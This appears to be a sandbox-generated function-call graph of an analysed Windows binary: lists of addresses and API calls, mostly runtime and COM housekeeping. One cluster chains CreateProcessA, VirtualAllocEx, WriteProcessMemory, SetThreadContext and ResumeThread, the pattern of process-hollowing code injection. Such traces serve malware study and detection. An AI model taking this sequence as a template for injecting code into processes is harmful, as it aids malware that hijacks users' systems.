6f08ac75 RaiseException 58916->58927 58918 6f025b32 58918->58843 58919 6f025ae5 58919->58918 58920 6f089bb5 77 API calls 58919->58920 58921 6f025b07 58920->58921 58921->58918 58928 6f089533 66 API calls std::exception::_Copy_str 58921->58928 58923 6f025b1d 58929 6f08ac75 RaiseException 58923->58929 58925->58846 58926->58916 58927->58919 58928->58923 58929->58918 58930->58854 58931->58856 58932->58863 58933->58865 58934->58869 58935->58867 58936->58879 58938 6f089bb5 77 API calls 58937->58938 58939 6f025489 58938->58939 58940 6f025727 58939->58940 58941 6f025494 58939->58941 58980 6f089533 66 API calls std::exception::_Copy_str 58940->58980 58969 6f025760 58941->58969 58945 6f025739 58981 6f08ac75 RaiseException 58945->58981 58947 6f025760 77 API calls 58949 6f02550d 58947->58949 58948 6f025750 58950 6f025760 77 API calls 58949->58950 58952 6f02554d 58950->58952 58951 6f025760 77 API calls 58953 6f02558d 58951->58953 58952->58951 58954 6f025760 77 API calls 58953->58954 58955 6f0255cd 58954->58955 58956 6f025760 77 API calls 58955->58956 58957 6f02560d 58956->58957 58958 6f025760 77 API calls 58957->58958 58959 6f02564d 58958->58959 58960 6f025760 77 API calls 58959->58960 58961 6f02568d 58960->58961 58977 6f025830 77 API calls __cftof_l 58961->58977 58963 6f0256d2 58964 6f0256dc 58963->58964 58978 6f08919e 67 API calls 3 library calls 58963->58978 58979 6f033530 67 API calls 58964->58979 58967 6f025705 collate 58967->58884 58968->58886 58970 6f02579c 58969->58970 58971 6f0257e6 58970->58971 58972 6f025a30 77 API calls 58970->58972 58975 6f08948b __cftof_l 5 API calls 58971->58975 58973 6f0257dc 58972->58973 58982 6f033cc0 67 API calls 58973->58982 58976 6f0254cd 58975->58976 58976->58947 58977->58963 58978->58964 58979->58967 58980->58945 58981->58948 58982->58971 58984 6f032199 58983->58984 58985 6f03217d 58983->58985 58986 6f089bb5 77 API calls 58984->58986 58985->58889 58987 6f0321a0 58986->58987 58988 6f089bb5 77 API calls 58987->58988 58989 6f0321c7 58988->58989 58990 6f035050 77 API calls 58989->58990 58991 6f0321e1 58990->58991 58992 6f089bb5 77 API calls 58991->58992 58993 6f0321e8 58992->58993 58994 6f035050 77 API calls 58993->58994 58995 6f032202 58994->58995 58996 6f0316b0 341 API calls 58995->58996 58997 6f03222a collate 58996->58997 58997->58889 58999 6f089bb5 77 API calls 58998->58999 59000 6f03632b 58999->59000 59001 6f089bb5 77 API calls 59000->59001 59002 6f036350 59001->59002 59003 6f035050 77 API calls 59002->59003 59004 6f03636e 59003->59004 59005 6f089bb5 77 API calls 59004->59005 59006 6f036375 59005->59006 59007 6f035050 77 API calls 59006->59007 59008 6f036392 59007->59008 59009 6f089bb5 77 API calls 59008->59009 59010 6f036399 59009->59010 59011 6f035050 77 API calls 59010->59011 59012 6f0363b3 59011->59012 59013 6f089bb5 77 API calls 59012->59013 59014 6f0363c9 59013->59014 59015 6f0363d4 59014->59015 59016 6f036459 59014->59016 59018 6f0316b0 341 API calls 59015->59018 59023 6f089533 66 API calls std::exception::_Copy_str 59016->59023 59022 6f036402 collate 59018->59022 59019 6f03646b 59024 6f08ac75 RaiseException 59019->59024 59021 6f036482 59022->58891 59023->59019 59024->59021 59026 6f039121 59025->59026 59027 6f03912c EnterCriticalSection 59025->59027 59026->58895 59028 6f039150 59027->59028 59029 6f03915b LeaveCriticalSection 59028->59029 59030 6f03923f 59029->59030 59031 6f03916a EnterCriticalSection 59029->59031 59030->58895 59032 6f039185 59031->59032 59033 6f039190 LeaveCriticalSection 59032->59033 59033->59030 59034 6f0391a1 59033->59034 59041 6f046b10 59034->59041 59045 6f046b64 59041->59045 59042 6f046f19 InterlockedCompareExchange 59044 6f0391f3 59042->59044 59044->59030 59112 6f039840 59044->59112 59045->59042 59127 6f052e20 59045->59127 59047 6f046f12 SafeArrayDestroy 59047->59042 59048 6f046bc2 59048->59042 59111 6f046edd 59048->59111 59131 6f0528c0 InterlockedCompareExchange 59048->59131 59050 6f046c6b 59050->59042 59051 6f046c7e SafeArrayGetLBound 59050->59051 59050->59111 59052 6f046c99 SafeArrayGetUBound 59051->59052 59051->59111 59053 6f046cb4 SafeArrayAccessData 59052->59053 59052->59111 59054 6f046cd5 59053->59054 59053->59111 59132 6f045760 67 API calls std::tr1::_Xweak 59054->59132 59056 6f046cf5 SafeArrayUnaccessData 59057 6f046d07 59056->59057 59056->59111 59057->59111 59133 6f031690 77 API calls 59057->59133 59059 6f046d2c 59060 6f089bb5 77 API calls 59059->59060 59061 6f046d3f 59060->59061 59062 6f035050 77 API calls 59061->59062 59063 6f046d59 59062->59063 59064 6f089bb5 77 API calls 59063->59064 59065 6f046d63 59064->59065 59066 6f035050 77 API calls 59065->59066 59067 6f046d7f 59066->59067 59068 6f089bb5 77 API calls 59067->59068 59069 6f046d86 59068->59069 59070 6f035050 77 API calls 59069->59070 59071 6f046da0 59070->59071 59134 6f0350c0 77 API calls 59071->59134 59073 6f046dab 59074 6f089bb5 77 API calls 59073->59074 59075 6f046db2 59074->59075 59076 6f035050 77 API calls 59075->59076 59077 6f046dcf 59076->59077 59135 6f0350c0 77 API calls 59077->59135 59079 6f046dda 59080 6f089bb5 77 API calls 59079->59080 59081 6f046de7 59080->59081 59082 6f035050 77 API calls 59081->59082 59083 6f046e01 59082->59083 59136 6f0350c0 77 API calls 59083->59136 59085 6f046e0c 59086 6f089bb5 77 API calls 59085->59086 59087 6f046e19 59086->59087 59088 6f035050 77 API calls 59087->59088 59089 6f046e33 59088->59089 59090 6f089bb5 77 API calls 59089->59090 59091 6f046e3a 59090->59091 59092 6f035050 77 API calls 59091->59092 59093 6f046e58 59092->59093 59094 6f089bb5 77 API calls 59093->59094 59095 6f046e5f 59094->59095 59096 6f035050 77 API calls 59095->59096 59097 6f046e79 59096->59097 59137 6f0350c0 77 API calls 59097->59137 59099 6f046e84 59138 6f0350c0 77 API calls 59099->59138 59101 6f046e8f 59102 6f089bb5 77 API calls 59101->59102 59103 6f046e9b 59102->59103 59104 6f035050 77 API calls 59103->59104 59105 6f046eb5 59104->59105 59139 6f0350c0 77 API calls 59105->59139 59107 6f046ec0 59140 6f0350c0 77 API calls 59107->59140 59109 6f046ecb 59141 6f032a40 341 API calls 59109->59141 59111->59042 59111->59047 59113 6f089bb5 77 API calls 59112->59113 59114 6f039865 59113->59114 59115 6f039227 59114->59115 59142 6f089533 66 API calls std::exception::_Copy_str 59114->59142 59120 6f037140 59115->59120 59117 6f0398ab 59143 6f08ac75 RaiseException 59117->59143 59119 6f0398c0 59144 6f052820 59120->59144 59122 6f03719c 59126 6f0371d7 59122->59126 59149 6f08919e 67 API calls 3 library calls 59122->59149 59123 6f0371f8 59123->58895 59126->59123 59150 6f089d2c 66 API calls 2 library calls 59126->59150 59128 6f052e67 59127->59128 59129 6f052e7b 59127->59129 59128->59129 59130 6f052e9f InterlockedCompareExchange 59128->59130 59129->59048 59130->59048 59131->59050 59132->59056 59133->59059 59134->59073 59135->59079 59136->59085 59137->59099 59138->59101 59139->59107 59140->59109 59141->59111 59142->59117 59143->59119 59145 6f052845 59144->59145 59146 6f0528af 59145->59146 59147 6f089d66 _malloc 66 API calls 59145->59147 59146->59122 59148 6f052876 59147->59148 59148->59122 59149->59126 59150->59123 59152 6f038bd5 EnterCriticalSection 59151->59152 59153 6f038bcc 59151->59153 59161 6f04e030 59152->59161 59153->58899 59157 6f038c13 LeaveCriticalSection 59157->58899 59162 6f04e090 59161->59162 59163 6f04e05d 59161->59163 59164 6f089bb5 77 API calls 59162->59164 59165 6f038bec 59163->59165 59166 6f089bb5 77 API calls 59163->59166 59164->59165 59167 6f03b6c0 GetModuleHandleW 59165->59167 59166->59165 59168 6f03b717 LoadLibraryW 59167->59168 59169 6f03b72a GetProcAddress 59167->59169 59168->59169 59170 6f03b94c 59168->59170 59169->59170 59173 6f03b73e 59169->59173 59171 6f08948b __cftof_l 5 API calls 59170->59171 59172 6f038bfa 59171->59172 59172->59157 59180 6f038c40 59172->59180 59173->59170 59174 6f03b85d 59173->59174 59194 6f08a116 80 API calls __mbstowcs_s_l 59174->59194 59176 6f03b875 GetModuleHandleW 59176->59170 59177 6f03b8aa GetProcAddress 59176->59177 59177->59170 59179 6f03b8f2 59177->59179 59179->59170 59195 6f03a350 VariantInit VariantInit VariantInit 59180->59195 59181 6f038c63 59182 6f038cf9 59181->59182 59205 6f038b10 EnterCriticalSection 59181->59205 59182->59157 59184 6f038c83 59186 6f038c9f 59184->59186 59187 6f038ce2 59184->59187 59214 6f03b9a0 59184->59214 59222 6f03bab0 59186->59222 59187->59157 59189 6f038cd3 59189->59187 59238 6f038ff0 69 API calls std::tr1::_Xweak 59189->59238 59194->59176 59199 6f03a3b5 59195->59199 59196 6f03a505 VariantClear VariantClear VariantClear 59197 6f03a52a 59196->59197 59197->59181 59198 6f03a3e0 VariantCopy 59200 6f03a3f9 59198->59200 59201 6f03a3ff VariantClear 59198->59201 59199->59196 59199->59198 59200->59201 59202 6f03a413 59201->59202 59202->59196 59203 6f03a549 VariantClear VariantClear VariantClear 59202->59203 59204 6f03a57a 59203->59204 59204->59181 59206 6f038b4b 59205->59206 59208 6f089bb5 77 API calls 59206->59208 59213 6f038b53 LeaveCriticalSection 59206->59213 59209 6f038b64 59208->59209 59210 6f038b80 59209->59210 59239 6f037370 79 API calls 3 library calls 59209->59239 59240 6f0396d0 77 API calls 59210->59240 59213->59184 59215 6f03b9dc 59214->59215 59216 6f03ba7a 59215->59216 59217 6f089bb5 77 API calls 59215->59217 59216->59186 59218 6f03ba3a 59217->59218 59219 6f03ba6a 59218->59219 59287 6f045f00 77 API calls 2 library calls 59218->59287 59241 6f046fd0 59219->59241 59288 6f04b580 59222->59288 59224 6f03baf3 59225 6f038cbd 59224->59225 59293 6f03af30 VariantInit VariantInit VariantInit 59224->59293 59225->59187 59229 6f038d60 EnterCriticalSection 59225->59229 59227 6f03bb0d 59227->59225 59228 6f089bb5 77 API calls 59227->59228 59228->59225 59313 6f039750 59229->59313 59232 6f038e0a 59232->59189 59234 6f038e02 59234->59189 59235 6f038d97 59235->59232 59236 6f038de5 59235->59236 59315 6f03bdf7 59235->59315 59325 6f038e20 59236->59325 59238->59187 59239->59210 59240->59213 59244 6f04700a 59241->59244 59286 6f0478c2 59241->59286 59242 6f08948b __cftof_l 5 API calls 59243 6f048326 59242->59243 59243->59216 59245 6f04713c WerSetFlags 59244->59245 59244->59286 59246 6f04715a 59245->59246 59247 6f03d920 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59246->59247 59246->59286 59248 6f0478b5 59247->59248 59249 6f03d920 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59248->59249 59248->59286 59250 6f047920 59249->59250 59251 6f03d920 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59250->59251 59250->59286 59252 6f047986 59251->59252 59253 6f03d920 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59252->59253 59254 6f0479df 59252->59254 59253->59254 59255 6f03d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59254->59255 59254->59286 59256 6f047a7b 59255->59256 59257 6f03d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59256->59257 59256->59286 59258 6f047acb 59257->59258 59259 6f03d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59258->59259 59258->59286 59260 6f047b19 59259->59260 59261 6f03d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59260->59261 59260->59286 59262 6f047b90 59261->59262 59263 6f03d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59262->59263 59262->59286 59264 6f047c0b 59263->59264 59265 6f03d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59264->59265 59264->59286 59266 6f047ca5 59265->59266 59267 6f03d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59266->59267 59266->59286 59268 6f047d3f 59267->59268 59269 6f03d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59268->59269 59268->59286 59270 6f047dbb 59269->59270 59271 6f03d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59270->59271 59270->59286 59272 6f047e44 59271->59272 59273 6f03d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59272->59273 59272->59286 59274 6f047eb5 59273->59274 59275 6f03d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59274->59275 59274->59286 59276 6f047f6e 59275->59276 59277 6f03d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59276->59277 59276->59286 59278 6f048081 59277->59278 59279 6f03d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59278->59279 59278->59286 59280 6f0480ca 59279->59280 59281 6f03d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59280->59281 59280->59286 59282 6f0480f9 59281->59282 59283 6f03d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59282->59283 59282->59286 59284 6f048175 59283->59284 59285 6f03d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 59284->59285 59284->59286 59285->59286 59286->59242 59287->59219 59289 6f04b5b5 59288->59289 59290 6f04b5cb VariantInit VariantInit 59288->59290 59289->59224 59291 6f04b5ee 59290->59291 59292 6f04b675 VariantClear VariantClear 59291->59292 59292->59224 59296 6f03af97 59293->59296 59294 6f03b22c VariantClear VariantClear VariantClear 59295 6f03b254 59294->59295 59295->59227 59296->59294 59297 6f03affe VariantCopy 59296->59297 59298 6f03b017 59297->59298 59299 6f03b01d VariantClear 59297->59299 59298->59299 59300 6f03b035 59299->59300 59300->59294 59301 6f089bb5 77 API calls 59300->59301 59302 6f03b0ae 59301->59302 59303 6f08a136 __NMSG_WRITE 66 API calls 59302->59303 59304 6f03b108 59303->59304 59305 6f03b190 SafeArrayGetLBound SafeArrayGetUBound 59304->59305 59306 6f03b28d VariantClear VariantClear VariantClear 59304->59306 59310 6f03b1fd collate 59304->59310 59308 6f03b28b 59305->59308 59309 6f03b1bf SafeArrayAccessData 59305->59309 59307 6f03b2ba 59306->59307 59307->59227 59308->59306 59309->59308 59311 6f03b1d3 _memmove 59309->59311 59310->59294 59312 6f03b1eb SafeArrayUnaccessData 59311->59312 59312->59308 59312->59310 59314 6f038d88 LeaveCriticalSection 59313->59314 59314->59232 59314->59235 59316 6f03be01 59315->59316 59317 6f03be2c SafeArrayDestroy 59316->59317 59319 6f03be33 59316->59319 59317->59319 59318 6f03befd collate 59321 6f08948b __cftof_l 5 API calls 59318->59321 59319->59318 59322 6f03be6a IsBadReadPtr 59319->59322 59324 6f03be77 59319->59324 59320 6f03af30 92 API calls 59320->59318 59323 6f03c00f 59321->59323 59322->59324 59323->59236 59324->59320 59326 6f038e39 59325->59326 59327 6f038e7c EnterCriticalSection 59326->59327 59333 6f038f7f collate 59326->59333 59328 6f038e9e 59327->59328 59329 6f038eac LeaveCriticalSection 59328->59329 59330 6f038ebd 59329->59330 59329->59333 59331 6f089bb5 77 API calls 59330->59331 59332 6f038ec4 _memset 59331->59332 59334 6f03c020 259 API calls 59332->59334 59333->59234 59334->59333 59336 6f089bb5 77 API calls 59335->59336 59337 6f036003 59336->59337 59338 6f089bb5 77 API calls 59337->59338 59339 6f036028 59338->59339 59340 6f035050 77 API calls 59339->59340 59341 6f036042 59340->59341 59342 6f089bb5 77 API calls 59341->59342 59343 6f036049 59342->59343 59344 6f035050 77 API calls 59343->59344 59345 6f036067 59344->59345 59346 6f089bb5 77 API calls 59345->59346 59347 6f03606e 59346->59347 59348 6f035050 77 API calls 59347->59348 59349 6f03608b 59348->59349 59350 6f089bb5 77 API calls 59349->59350 59351 6f036092 59350->59351 59352 6f035050 77 API calls 59351->59352 59353 6f0360ac 59352->59353 59354 6f0316b0 341 API calls 59353->59354 59355 6f0360de collate 59354->59355 59355->58903 59356 5956470 59357 5956493 59356->59357 59363 5940f14 341 API calls 59357->59363 59364 5940eb3 341 API calls 59357->59364 59358 59564a8 59365 5942840 59358->59365 59383 59431f3 59358->59383 59401 5942820 59358->59401 59359 59564e7 59363->59358 59364->59358 59367 5942873 59365->59367 59366 5943255 59366->59359 59367->59366 59370 5955c51 WriteProcessMemory 59367->59370 59371 5955a10 SetThreadContext 59367->59371 59372 5955a08 SetThreadContext 59367->59372 59382 5955c58 WriteProcessMemory 59367->59382 59419 5955fe0 59367->59419 59423 5955fdb 59367->59423 59427 5956508 59367->59427 59432 59564f7 59367->59432 59437 59565b2 59367->59437 59443 5955db0 59367->59443 59447 5955da8 59367->59447 59451 5955b38 59367->59451 59455 5955b31 59367->59455 59459 5955918 59367->59459 59463 5955920 59367->59463 59370->59367 59371->59367 59372->59367 59382->59367 59385 5942979 59383->59385 59384 5943255 59384->59359 59385->59384 59386 5955920 ResumeThread 59385->59386 59387 5955918 ResumeThread 59385->59387 59388 5955a10 SetThreadContext 59385->59388 59389 5955a08 SetThreadContext 59385->59389 59390 5955b31 VirtualAllocEx 59385->59390 59391 5955b38 VirtualAllocEx 59385->59391 59392 5955fe0 CreateProcessA 59385->59392 59393 5955fdb CreateProcessA 59385->59393 59394 59564f7 341 API calls 59385->59394 59395 59565b2 341 API calls 59385->59395 59396 5956508 341 API calls 59385->59396 59397 5955c51 WriteProcessMemory 59385->59397 59398 5955c58 WriteProcessMemory 59385->59398 59399 5955db0 ReadProcessMemory 59385->59399 59400 5955da8 ReadProcessMemory 59385->59400 59386->59385 59387->59385 59388->59385 59389->59385 59390->59385 59391->59385 59392->59385 59393->59385 59394->59385 59395->59385 59396->59385 59397->59385 59398->59385 59399->59385 59400->59385 59403 5942824 59401->59403 59402 5943255 59402->59359 59403->59402 59404 59564f7 341 API calls 59403->59404 59405 59565b2 341 API calls 59403->59405 59406 5956508 341 API calls 59403->59406 59407 5955db0 ReadProcessMemory 59403->59407 59408 5955da8 ReadProcessMemory 59403->59408 59409 5955920 ResumeThread 59403->59409 59410 5955918 ResumeThread 59403->59410 59411 5955a10 SetThreadContext 59403->59411 59412 5955a08 SetThreadContext 59403->59412 59413 5955c51 WriteProcessMemory 59403->59413 59414 5955c58 WriteProcessMemory 59403->59414 59415 5955b31 VirtualAllocEx 59403->59415 59416 5955b38 VirtualAllocEx 59403->59416 59417 5955fe0 CreateProcessA 59403->59417 59418 5955fdb CreateProcessA 59403->59418 59404->59403 59405->59403 59406->59403 59407->59403 59408->59403 59409->59403 59410->59403 59411->59403 59412->59403 59413->59403 59414->59403 59415->59403 59416->59403 59417->59403 59418->59403 59420 5956067 CreateProcessA 59419->59420 59422 59562bc 59420->59422 59424 5956067 CreateProcessA 59423->59424 59426 59562bc 59424->59426 59428 5956509 59427->59428 59429 595657d 59428->59429 59430 5940f14 341 API calls 59428->59430 59431 5940eb3 341 API calls 59428->59431 59429->59367 59430->59428 59431->59428 59433 5956508 59432->59433 59434 595657d 59433->59434 59435 5940f14 341 API calls 59433->59435 59436 5940eb3 341 API calls 59433->59436 59434->59367 59435->59433 59436->59433 59439 5956509 59437->59439 59440 59565b6 59437->59440 59438 595657d 59438->59367 59439->59438 59441 5940f14 341 API calls 59439->59441 59442 5940eb3 341 API calls 59439->59442 59440->59367 59441->59439 59442->59439 59444 5955db4 ReadProcessMemory 59443->59444 59446 5955e74 59444->59446 59446->59367 59448 5955db0 ReadProcessMemory 59447->59448 59450 5955e74 59448->59450 59450->59367 59452 5955b3c VirtualAllocEx 59451->59452 59454 5955bf4 59452->59454 59454->59367 59456 5955b38 VirtualAllocEx 59455->59456 59458 5955bf4 59456->59458 59458->59367 59460 5955920 ResumeThread 59459->59460 59462 59559b0 59460->59462 59462->59367 59464 5955924 ResumeThread 59463->59464 59466 59559b0 59464->59466 59466->59367 59467 6f070400 59486 6f077b80 77 API calls collate 59467->59486 59469 6f070443 59470 6f0704ba 59469->59470 59487 6f057940 59469->59487 59496 6f05c6e0 77 API calls 2 library calls 59470->59496 59473 6f0704bf _memmove 59497 6f06ff00 77 API calls __cftof_l 59473->59497 59475 6f07046d 59493 6f070230 81 API calls _memset 59475->59493 59478 6f0704fb 59479 6f070480 59494 6f0776d0 77 API calls 59479->59494 59481 6f070489 59495 6f077c20 77 API calls 59481->59495 59483 6f07049a 59484 6f08948b __cftof_l 5 API calls 59483->59484 59485 6f0704b4 59484->59485 59486->59469 59488 6f05797b 59487->59488 59489 6f089af4 __cinit 76 API calls 59488->59489 59490 6f05797f 59488->59490 59489->59490 59491 6f08948b __cftof_l 5 API calls 59490->59491 59492 6f057a1a 59491->59492 59492->59470 59492->59475 59493->59479 59494->59481 59495->59483 59496->59473 59497->59478 60199 6f08a510 60200 6f08a515 60199->60200 60202 6f08fe93 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 60199->60202 60202->60200 59498 6f0516af 59499 6f0516b4 59498->59499 59500 6f05170f 59499->59500 59502 6f089bb5 77 API calls 59499->59502 59501 6f051769 59500->59501 59504 6f089bb5 77 API calls 59500->59504 59503 6f0517c3 59501->59503 59506 6f089bb5 77 API calls 59501->59506 59505 6f0516cd 59502->59505 59509 6f05181d 59503->59509 59514 6f089bb5 77 API calls 59503->59514 59507 6f051727 59504->59507 59508 6f0516e9 59505->59508 59548 6f04ea40 59505->59548 59510 6f051781 59506->59510 59511 6f051743 59507->59511 59519 6f04ea40 78 API calls 59507->59519 59553 6f038400 77 API calls 2 library calls 59508->59553 59512 6f051877 59509->59512 59520 6f089bb5 77 API calls 59509->59520 59517 6f05179d 59510->59517 59523 6f04ea40 78 API calls 59510->59523 59555 6f038400 77 API calls 2 library calls 59511->59555 59518 6f0518d1 59512->59518 59524 6f089bb5 77 API calls 59512->59524 59515 6f0517db 59514->59515 59521 6f0517f7 59515->59521 59527 6f04ea40 78 API calls 59515->59527 59557 6f038400 77 API calls 2 library calls 59517->59557 59519->59511 59525 6f051835 59520->59525 59559 6f038400 77 API calls 2 library calls 59521->59559 59522 6f051705 59554 6f0380b0 67 API calls collate 59522->59554 59523->59517 59529 6f05188f 59524->59529 59531 6f051851 59525->59531 59537 6f04ea40 78 API calls 59525->59537 59527->59521 59535 6f0518ab 59529->59535 59540 6f04ea40 78 API calls 59529->59540 59561 6f038400 77 API calls 2 library calls 59531->59561 59532 6f05175f 59556 6f0380b0 67 API calls collate 59532->59556 59563 6f038400 77 API calls 2 library calls 59535->59563 59536 6f0517b9 59558 6f0380b0 67 API calls collate 59536->59558 59537->59531 59539 6f051813 59560 6f0380b0 67 API calls collate 59539->59560 59540->59535 59542 6f05186d 59562 6f0380b0 67 API calls collate 59542->59562 59546 6f0518c7 59564 6f0380b0 67 API calls collate 59546->59564 59549 6f089bb5 77 API calls 59548->59549 59550 6f04ea6b 59549->59550 59551 6f04ea7e SysAllocString 59550->59551 59552 6f04ea99 59550->59552 59551->59552 59552->59508 59553->59522 59554->59500 59555->59532 59556->59501 59557->59536 59558->59503 59559->59539 59560->59509 59561->59542 59562->59512 59563->59546 59564->59518 59565 6f04e2ce 59566 6f089bb5 77 API calls 59565->59566 59567 6f04e2d5 59566->59567 59568 6f04e2ee 59567->59568 59622 6f051fd0 59567->59622 59572 6f089bb5 77 API calls 59568->59572 59582 6f04e343 59568->59582 59570 6f04e3a6 59577 6f089bb5 77 API calls 59570->59577 59621 6f04e564 collate 59570->59621 59571 6f04e360 59573 6f089bb5 77 API calls 59571->59573 59574 6f04e327 59572->59574 59575 6f04e367 59573->59575 59647 6f04eae0 59574->59647 59662 6f051910 78 API calls 2 library calls 59575->59662 59576 6f08948b __cftof_l 5 API calls 59578 6f04e76e 59576->59578 59580 6f04e400 59577->59580 59584 6f089bb5 77 API calls 59580->59584 59582->59570 59582->59571 59583 6f04e384 59663 6f051b20 11 API calls __cftof_l 59583->59663 59585 6f04e428 59584->59585 59588 6f035050 77 API calls 59585->59588 59587 6f04e399 59587->59570 59589 6f04e442 59588->59589 59590 6f089bb5 77 API calls 59589->59590 59591 6f04e449 59590->59591 59592 6f035050 77 API calls 59591->59592 59593 6f04e463 59592->59593 59594 6f089bb5 77 API calls 59593->59594 59595 6f04e46a 59594->59595 59596 6f035050 77 API calls 59595->59596 59597 6f04e484 59596->59597 59598 6f089bb5 77 API calls 59597->59598 59599 6f04e48b 59598->59599 59600 6f035050 77 API calls 59599->59600 59601 6f04e4a5 59600->59601 59602 6f089bb5 77 API calls 59601->59602 59603 6f04e4ac 59602->59603 59604 6f035050 77 API calls 59603->59604 59605 6f04e4c6 59604->59605 59606 6f04e4d3 59605->59606 59664 6f08919e 67 API calls 3 library calls 59605->59664 59608 6f089bb5 77 API calls 59606->59608 59609 6f04e4e3 59608->59609 59610 6f035050 77 API calls 59609->59610 59611 6f04e4fd 59610->59611 59612 6f089bb5 77 API calls 59611->59612 59613 6f04e504 59612->59613 59614 6f035050 77 API calls 59613->59614 59615 6f04e51e 59614->59615 59616 6f089bb5 77 API calls 59615->59616 59617 6f04e525 59616->59617 59618 6f035050 77 API calls 59617->59618 59619 6f04e53f 59618->59619 59620 6f0316b0 341 API calls 59619->59620 59620->59621 59621->59576 59623 6f089bb5 77 API calls 59622->59623 59624 6f052013 59623->59624 59625 6f052020 59624->59625 59626 6f0521f3 59624->59626 59665 6f056480 59625->59665 59699 6f089533 66 API calls std::exception::_Copy_str 59626->59699 59629 6f05220b 59700 6f08ac75 RaiseException 59629->59700 59631 6f052226 59632 6f05206c 59681 6f0235f0 59632->59681 59634 6f05216e 59692 6f052300 59634->59692 59636 6f052194 59637 6f052300 77 API calls 59636->59637 59638 6f0521a0 59637->59638 59639 6f052300 77 API calls 59638->59639 59640 6f0521ad 59639->59640 59641 6f052300 77 API calls 59640->59641 59642 6f0521ba 59641->59642 59643 6f052300 77 API calls 59642->59643 59644 6f0521c6 59643->59644 59645 6f08948b __cftof_l 5 API calls 59644->59645 59646 6f0521ef 59645->59646 59646->59568 59648 6f089bb5 77 API calls 59647->59648 59649 6f04eb17 59648->59649 59650 6f04eb22 59649->59650 59651 6f04f4c9 59649->59651 59745 6f08a25a GetSystemTimeAsFileTime 59650->59745 59753 6f089533 66 API calls std::exception::_Copy_str 59651->59753 59653 6f04f4dc 59754 6f08ac75 RaiseException 59653->59754 59656 6f04f4f1 59657 6f04eb5b 59747 6f089dfa 59657->59747 59662->59583 59663->59587 59664->59606 59666 6f05655d 59665->59666 59669 6f0564c8 59665->59669 59667 6f08948b __cftof_l 5 API calls 59666->59667 59668 6f05657d 59667->59668 59668->59632 59669->59666 59670 6f05651d 59669->59670 59701 6f022f40 77 API calls 59669->59701 59670->59666 59704 6f022f40 77 API calls 59670->59704 59673 6f056535 59705 6f056400 77 API calls std::tr1::_Xweak 59673->59705 59674 6f0564f5 59702 6f056400 77 API calls std::tr1::_Xweak 59674->59702 59677 6f05654e 59706 6f08ac75 RaiseException 59677->59706 59678 6f05650e 59703 6f08ac75 RaiseException 59678->59703 59707 6f076d40 59681->59707 59684 6f056480 77 API calls 59685 6f02364c 59684->59685 59714 6f024b30 59685->59714 59687 6f0236a7 59718 6f0586e0 59687->59718 59689 6f0236bc 59690 6f08948b __cftof_l 5 API calls 59689->59690 59691 6f023701 59690->59691 59691->59634 59693 6f05231d 59692->59693 59694 6f0523aa 59693->59694 59695 6f089bb5 77 API calls 59693->59695 59694->59636 59697 6f052331 59695->59697 59696 6f052374 collate 59696->59636 59697->59696 59744 6f052480 77 API calls 59697->59744 59699->59629 59700->59631 59701->59674 59702->59678 59703->59670 59704->59673 59705->59677 59706->59666 59708 6f056480 77 API calls 59707->59708 59709 6f076d7f 59708->59709 59726 6f058d80 59709->59726 59712 6f08948b __cftof_l 5 API calls 59713 6f023630 59712->59713 59713->59684 59715 6f024b65 59714->59715 59736 6f024fa0 59715->59736 59717 6f024b7f 59717->59687 59719 6f058728 59718->59719 59720 6f058765 59719->59720 59742 6f057cd0 77 API calls 3 library calls 59719->59742 59721 6f08948b __cftof_l 5 API calls 59720->59721 59722 6f05878a 59721->59722 59722->59689 59724 6f058756 59743 6f08ac75 RaiseException 59724->59743 59727 6f089d66 _malloc 66 API calls 59726->59727 59730 6f058d8f 59727->59730 59728 6f058dbb 59728->59712 59729 6f0891f6 70 API calls 59729->59730 59730->59728 59730->59729 59731 6f058dc1 std::exception::exception 59730->59731 59734 6f089d66 _malloc 66 API calls 59730->59734 59735 6f08ac75 RaiseException 59731->59735 59733 6f058df0 59734->59730 59735->59733 59737 6f089bb5 77 API calls 59736->59737 59738 6f024fcf 59737->59738 59740 6f024ff1 59738->59740 59741 6f025050 81 API calls _memcpy_s 59738->59741 59740->59717 59741->59740 59742->59724 59743->59720 59744->59694 59746 6f08a28a __aulldiv 59745->59746 59746->59657 59755 6f08eae6 59747->59755 59750 6f089e0c 59751 6f08eae6 __getptd 66 API calls 59750->59751 59752 6f04eb69 59751->59752 59752->59582 59753->59653 59754->59656 59760 6f08ea6d GetLastError 59755->59760 59757 6f08eaee 59759 6f04eb61 59757->59759 59774 6f08d4f6 66 API calls 3 library calls 59757->59774 59759->59750 59761 6f08e948 ___set_flsgetvalue 3 API calls 59760->59761 59763 6f08ea84 59761->59763 59762 6f08eada SetLastError 59762->59757 59763->59762 59764 6f08cb28 __calloc_crt 62 API calls 59763->59764 59765 6f08ea98 59764->59765 59765->59762 59766 6f08eaa0 DecodePointer 59765->59766 59767 6f08eab5 59766->59767 59768 6f08eab9 59767->59768 59769 6f08ead1 59767->59769 59775 6f08e9b9 66 API calls 4 library calls 59768->59775 59776 6f089d2c 66 API calls 2 library calls 59769->59776 59772 6f08eac1 GetCurrentThreadId 59772->59762 59773 6f08ead7 59773->59762 59775->59772 59776->59773 60203 1130848 60204 1130864 